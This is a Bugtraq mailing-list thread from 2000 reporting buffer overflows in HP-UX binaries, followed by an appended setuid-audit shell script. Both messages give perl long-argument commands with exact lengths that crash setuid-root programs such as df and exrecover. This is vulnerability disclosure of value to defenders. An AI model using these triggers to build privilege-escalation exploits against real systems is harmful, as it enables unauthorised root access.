Bugtraq mailing list archives
Re: Possible vulnerability in HPUX ( Add vulnerability List )
From: ??? <loveyou () hackerslab org>
Date: Thu, 10 Aug 2000 13:36:50 +0900
Hi..

SYSTEM : HP-UX neptune B.11.00 A 9000/785

Memory fault vulnerability list
---------------------------------

/usr/bin/cancel `perl -e 'print "x" x 6080'` -ua
Memory fault

/bin/lpstat `perl -e 'print "x" x 185'`
Memory fault

$ kermit -y `perl -e 'print "x" x 5085'`
[/home/loveyou] C-Kermit>q
Memory fault(coredump)

$ kermit -x `perl -e 'print "x" x 222'`
Executing /usr/share/lib/kermit/ckermit.ini for UNIX...
Good Evening.
Memory fault(coredump)

/usr/sbin/swinstall -s `perl -e 'print "x" x 5085'`
/usr/sbin/swpackage -x `perl -e 'print "x" x 5085'`
Memory fault
/usr/sbin/swcopy -s `perl -e 'print "x" x 5085'`
/usr/sbin/swask -s `perl -e 'print "x" x 5000'`
/usr/dt/bin/dtterm -tn `perl -e 'print "x" x 1019'`
/bin/rlogin `perl -e 'print "x" x 17080'` -l loveyou

:-)

by loveyou ( loveyou () hackerslab org )

----- Original Message -----
From: "Quentin GIORGI" <qgiorgi () SANCERRE GRENOBLE HP COM>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Wednesday, August 09, 2000 4:31 PM
Subject: Possible vulnerability in HPUX
Hello,

A few days ago I read the mail
[ Hackerslab bug_paper ] HP-UX bdf -t option buffer overflow vul.
and decided to look for any other possible vulnerability(ies) on my system (HP-UX 10.20).

After a *few* minutes ( maybe a little more :) ), trying each setuid exe with different options, I finally got results as for bdf:

My basic knowledge tells me that it could be exploitable, but as I am not a PA RISC assembly expert, I let anyone decide.
I have a quick query on the database vulnerability and can't see anything about this on HPUX, but...

df:
---
sancerre: /home/qgiorgi>ll `which df`
-r-sr-xr-x 1 root bin 69632 Jun 10 1996 /usr/bin/df
sancerre: /home/qgiorgi>df -F `perl -e "print 't'x3631"`
df: ttt <skip> ttt : No such file or directory
usage : df [-F FStype] [-V] [-egiklnvfb] [-t|-P] [-o specific_options] [special | directory ...]
sancerre: /home/qgiorgi>df -F `perl -e "print 't'x3632"`
Segmentation fault

exrecover:
--------
sancerre: /home/qgiorgi>ll `which exrecover`
-r-sr-xr-x 1 root bin 20480 May 30 1996 /usr/lbin/exrecover
sancerre: /home/qgiorgi>exrecover anythingUwant `perl -e "print 't'x4703"`
File not found
sancerre: /home/qgiorgi>exrecover anythingUwant `perl -e "print 't'x4704"`
Segmentation fault

And eventually, but it is owned by uucp, so I think it's less interesting.

uusub:
-----
sancerre: /home/qgiorgi>ll `which uusub`
-r-sr-xr-x 1 uucp bin 32768 May 30 1996 /usr/lib/uucp/uusub
sancerre: /home/qgiorgi>uusub -a `perl -e "print 't'x212"`
sancerre: /home/qgiorgi>
sancerre: /home/qgiorgi>uusub -a `perl -e "print 't'x213"`
Segmentation fault

I also tried this on HPUX 11.00 (9911):
uusub works with length of 225
exrecover works with length > 2700

I hope this could help.

---------------------------------------------------------------------------
Quentin GIORGI
Network Engineer
E.I.C IDA
---------------------------------------------------------------------------
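
For administrators triaging the reports above, an added example (not part of either message) that checks which of the binaries named in the thread are installed and carry the setuid or setgid bit, so they can be reviewed or have the bit removed. The function names and the optional ROOT prefix argument are assumptions of this example; kermit is omitted because the thread gives no path for it.

```shell
#!/bin/sh
# Added example: report which binaries named in this thread are present and
# carry the setuid/setgid bit. The paths come from the two messages; the
# optional ROOT prefix is an assumption so the check can also be run against
# a mounted image or a test tree instead of the live filesystem.

THREAD_PATHS="/usr/bin/cancel /bin/lpstat /usr/sbin/swinstall
/usr/sbin/swpackage /usr/sbin/swcopy /usr/sbin/swask /usr/dt/bin/dtterm
/bin/rlogin /usr/bin/df /usr/lbin/exrecover /usr/lib/uucp/uusub"

# audit_setid [ROOT]
# Prints one line per path:
#   <path> <missing|plain|setuid|setgid|setuid+setgid> <owner or ->
audit_setid() {
    root=${1:-}
    for p in $THREAD_PATHS; do
        f="$root$p"
        if [ ! -f "$f" ]; then
            echo "$p missing -"
            continue
        fi
        mode=plain
        [ -u "$f" ] && mode=setuid
        if [ -g "$f" ]; then
            [ "$mode" = setuid ] && mode=setuid+setgid || mode=setgid
        fi
        # Owner matters: a setuid-root binary is a larger exposure than
        # one owned by an unprivileged service account such as uucp.
        owner=$(ls -ld "$f" | awk '{print $3}')
        echo "$p $mode $owner"
    done
}

# count_setid [ROOT]: number of listed binaries that run with elevated ids.
count_setid() {
    audit_setid "${1:-}" | awk '$2 ~ /^set/ {n++} END {print n+0}'
}

# Report for the live filesystem, or for the tree given as the first argument.
audit_setid "${1:-}"
```

Entries reported as setuid with owner root are the ones to prioritise for vendor patches or for removing the bit where the elevated privilege is not needed.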